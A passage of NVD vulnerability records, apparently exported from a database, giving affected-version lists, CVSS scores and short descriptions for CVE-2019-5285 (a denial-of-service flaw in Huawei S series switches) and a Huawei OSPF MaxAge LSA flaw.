                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1E122468-50F4-4216-A8F9-04D4DCEC8BE7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "B7B0C041-0B3F-441F-B98B-522FF7039C01",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "88DD2BD9-F4FE-4438-B792-4A02E6028B99",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6279E671-644C-4EC6-A675-732BD0B389B8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "40745A01-E5AC-4207-A34F-D8E7F7231F83",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FA744621-893C-4F7E-80A1-66559BC6D6F4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "AFD7EF17-710B-4363-87B7-CE1B4447BF99",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "17CDA635-A9E7-4678-8970-22DFC028BAF7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "71348C1D-8243-4585-B87A-AFE457700243",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "299234CD-AD78-4C53-8B7E-C0B22681ADB2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7581063D-DFFB-49CE-8099-D39C52B9AAC2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "B850D4D0-6444-44EE-9E1F-4A48931D7580",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EFD0C771-7387-41B8-BDEF-20028013D145",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "08E7A78F-7F37-41B8-BC9A-B3CC9DFFC671",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s600-e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "3E02D610-AB78-476B-9049-FDB66D9E9907",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C330A14-C941-4B28-AA9C-B78A96A9011D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6818ECD-730B-40D6-9108-B8540CC4BF1E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D5811970-FE82-4888-A01D-B356B5578296",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1CEE877-AF03-4A5B-84AA-8EB8067E04F1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "E5A9491C-AA2F-4E2F-8FB7-C6D6D653B343",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "94D35430-7723-4277-BEE5-FC002465A521",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DBC7370E-7CD1-49DC-8B1E-779E269E8CCE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "749B68B9-9F62-4E7A-AC86-F4073BA32E18",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F18D9776-5CE7-4DD3-9119-7FB08A35B955",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF4AF711-D921-4261-A459-2A0780EA951F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "91E52545-B12E-43EC-B132-28FA2E511316",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "0C34E6D4-67FE-4AA4-A825-9666A302F771",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA68BF50-9118-445D-B778-E60812E67B98",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "756F699B-4EA0-4A77-8068-CB25B99893EB",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BFADB02-AD16-4B58-AFF9-B659BDB3E025",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1DFF0C0-AA17-4AA1-A418-4759D1A58852",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D84F05D5-BA7D-485B-91C2-273349335CFB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF3FB3CC-2EAC-4A08-BDDC-DCACEE9FA2AE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2377CD30-6F57-46CB-9DD1-E29458A7D928",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D79CD09-3414-4105-AD59-F3D1BAC61B7E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "37E3F87E-EA36-41ED-8793-F6C166FFC4A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "26F2CC30-626B-4FEE-BDAD-6A5990DE6384",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D43F5AE6-A4CD-4C45-A8A4-D5B064FE7C27",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D48511A7-A013-4C34-8F4F-67289F3BD442",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7900_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "4B9B6C9C-9270-4904-895B-C60B15A1479E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7900_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3F50FCA7-107F-429E-BEC8-29A27AAEF3AF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7900_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "922C5EBF-C9BF-4363-AE3C-E30AD7060484",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7900:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EECEBC19-EE35-471D-A062-1E6B33B40A02",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "473B6E52-E60F-4D3C-9028-E362DF2A8327",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E7DB9D3-BB34-49BE-8302-A054D79FE8D6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ACAD052-796D-428E-95B1-65099952B773",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "701D6571-8708-4DB3-9021-ED48C5874503",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "B2420E92-C734-47C7-A5DC-A057553160B2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E1DE905E-5CE3-42F6-B6E1-F57DC886C3C7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9C42090D-C76E-48EC-BA54-BB39A489373D",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300x_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A20E2DAD-8579-49F0-AEA8-B5AF5DBD025F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300x_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "1AB5D982-3C99-4FCF-B5ED-265C6CA287F9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300x_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A63DEED-6909-4E95-8F05-3EF7C268A224",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300x_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C7098404-C4B7-4657-9FFB-7298C310684C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "808C627E-4D42-459B-BBE0-6FF8FF143D80",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "06AD9ACA-E0C3-4096-BE50-94E717CDA318",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "325D6523-A07A-48D4-AD44-CF838BD77432",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC7E622-010C-4C5D-8AA6-D4793AFCE0E0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D78DAB13-32AA-4813-AB0A-0EA870F41183",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "36AB80F7-1BD2-4169-AC70-708CE84BB15C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0C6DC309-2FC6-4014-9C2B-8EE12C7BB08F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "1B06663D-8499-42B9-83E1-E369F1FD0070",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1B299A06-5D99-43A8-ACF3-4D79174C536E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "88100CA8-11C0-4D63-ADD8-C01176B6CE3F",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109)",
      },
      {
         lang: "es",
         value: "Algunos conmutadores de la serie S de Huawei tienen una vulnerabilidad DoS. Un atacante remoto no autorizado puede enviar paquetes diseñados al dispositivo afectado para aprovechar esta vulnerabilidad. Debido a una verificación insuficiente de los paquetes, la operación éxito puede provocar el reinicio del dispositivo y la condición de denegación de servicio (DoS). (ID de vulnerabilidad: HWPSIRT-2019-03109)",
      },
   ],
   id: "CVE-2019-5285",
   lastModified: "2024-11-21T04:44:40.310",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2019-06-04T19:29:00.477",
   references: [
      {
         source: "psirt@huawei.com",
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
      },
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2017-11-22 19:29
Modified
2024-11-21 03:33
Summary
AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack.
Impacted products
Vendor Product Version
huawei ac6005_firmware v200r006c10spc200
huawei ac6005 -
huawei ac6605_firmware v200r006c10spc200
huawei ac6605 -
huawei ar1200_firmware v200r005c10cp0582t
huawei ar1200_firmware v200r005c10hp0581t
huawei ar1200_firmware v200r005c20spc026t
huawei ar1200 -
huawei ar200_firmware v200r005c20spc026t
huawei ar200 -
huawei ar3200_firmware v200r005c20spc026t
huawei ar3200 -
huawei cloudengine_12800_firmware v100r003c00
huawei cloudengine_12800_firmware v100r005c00
huawei cloudengine_12800_firmware v100r005c10
huawei cloudengine_12800_firmware v100r006c00
huawei cloudengine_12800_firmware v200r001c00
huawei cloudengine_12800 -
huawei cloudengine_5800_firmware v100r003c00
huawei cloudengine_5800_firmware v100r005c00
huawei cloudengine_5800_firmware v100r005c10
huawei cloudengine_5800_firmware v100r006c00
huawei cloudengine_5800_firmware v200r001c00
huawei cloudengine_5800 -
huawei cloudengine_6800_firmware v100r003c00
huawei cloudengine_6800_firmware v100r005c00
huawei cloudengine_6800_firmware v100r005c10
huawei cloudengine_6800_firmware v100r006c00
huawei cloudengine_6800_firmware v200r001c00
huawei cloudengine_6800 -
huawei cloudengine_7800_firmware v100r003c00
huawei cloudengine_7800_firmware v100r005c00
huawei cloudengine_7800_firmware v100r005c10
huawei cloudengine_7800_firmware v100r006c00
huawei cloudengine_7800_firmware v200r001c00
huawei cloudengine_7800 -
huawei cloudengine_8800_firmware v100r006c00
huawei cloudengine_8800_firmware v200r001c00
huawei cloudengine_8800 -
huawei e600_firmware v200r008c00
huawei e600 -
huawei s12700_firmware v200r005c00
huawei s12700_firmware v200r006c00
huawei s12700_firmware v200r007c00
huawei s12700_firmware v200r008c00
huawei s12700 -
huawei s1700_firmware v100r006c00
huawei s1700_firmware v100r007c00
huawei s1700_firmware v200r006c00
huawei s1700 -
huawei s2300_firmware v100r005c00
huawei s2300_firmware v100r006c00
huawei s2300_firmware v100r006c03
huawei s2300_firmware v100r006c05
huawei s2300_firmware v200r003c00
huawei s2300_firmware v200r003c02
huawei s2300_firmware v200r003c10
huawei s2300_firmware v200r005c00
huawei s2300_firmware v200r005c01
huawei s2300_firmware v200r005c02
huawei s2300_firmware v200r005c03
huawei s2300_firmware v200r006c00
huawei s2300_firmware v200r007c00
huawei s2300_firmware v200r008c00
huawei s2300 -
huawei s2700_firmware v100r005c00
huawei s2700_firmware v100r006c00
huawei s2700_firmware v100r006c03
huawei s2700_firmware v100r006c05
huawei s2700_firmware v200r003c00
huawei s2700_firmware v200r003c02
huawei s2700_firmware v200r003c10
huawei s2700_firmware v200r005c00
huawei s2700_firmware v200r005c01
huawei s2700_firmware v200r005c02
huawei s2700_firmware v200r005c03
huawei s2700_firmware v200r006c00
huawei s2700_firmware v200r007c00
huawei s2700_firmware v200r008c00
huawei s2700 -
huawei s5300_firmware v100r005c00
huawei s5300_firmware v100r006c00
huawei s5300_firmware v100r006c01
huawei s5300_firmware v200r001c00
huawei s5300_firmware v200r001c01
huawei s5300_firmware v200r002c00
huawei s5300_firmware v200r003c00
huawei s5300_firmware v200r003c02
huawei s5300_firmware v200r003c10
huawei s5300_firmware v200r005c00
huawei s5300_firmware v200r006c00
huawei s5300_firmware v200r007c00
huawei s5300_firmware v200r008c00
huawei s5300 -
huawei s5700_firmware v100r005c00
huawei s5700_firmware v100r006c00
huawei s5700_firmware v100r006c01
huawei s5700_firmware v200r001c00
huawei s5700_firmware v200r001c01
huawei s5700_firmware v200r002c00
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r003c02
huawei s5700_firmware v200r003c10
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r006c00
huawei s5700_firmware v200r007c00
huawei s5700_firmware v200r008c00
huawei s5700 -
huawei s6300_firmware v100r006c00
huawei s6300_firmware v200r001c00
huawei s6300_firmware v200r001c01
huawei s6300_firmware v200r002c00
huawei s6300_firmware v200r003c00
huawei s6300_firmware v200r003c02
huawei s6300_firmware v200r003c10
huawei s6300_firmware v200r005c00
huawei s6300_firmware v200r008c00
huawei s6300 -
huawei s6700_firmware v100r006c00
huawei s6700_firmware v200r001c00
huawei s6700_firmware v200r001c01
huawei s6700_firmware v200r002c00
huawei s6700_firmware v200r003c00
huawei s6700_firmware v200r003c02
huawei s6700_firmware v200r003c10
huawei s6700_firmware v200r005c00
huawei s6700_firmware v200r006c00
huawei s6700_firmware v200r007c00
huawei s6700_firmware v200r008c00
huawei s6700 -
huawei s7700_firmware v100r003c00
huawei s7700_firmware v100r006c00
huawei s7700_firmware v200r001c00
huawei s7700_firmware v200r001c01
huawei s7700_firmware v200r002c00
huawei s7700_firmware v200r003c00
huawei s7700_firmware v200r005c00
huawei s7700_firmware v200r006c00
huawei s7700_firmware v200r007c00
huawei s7700_firmware v200r008c00
huawei s7700 -
huawei s9300_firmware v100r001c00
huawei s9300_firmware v100r002c00
huawei s9300_firmware v100r003c00
huawei s9300_firmware v100r006c00
huawei s9300_firmware v200r001c00
huawei s9300_firmware v200r002c00
huawei s9300_firmware v200r003c00
huawei s9300_firmware v200r005c00
huawei s9300_firmware v200r006c00
huawei s9300_firmware v200r007c00
huawei s9300_firmware v200r008c00
huawei s9300_firmware v200r008c10
huawei s9300 -
huawei s9700_firmware v200r001c00
huawei s9700_firmware v200r002c00
huawei s9700_firmware v200r003c00
huawei s9700_firmware v200r005c00
huawei s9700_firmware v200r006c00
huawei s9700_firmware v200r007c00
huawei s9700_firmware v200r008c00
huawei s9700 -
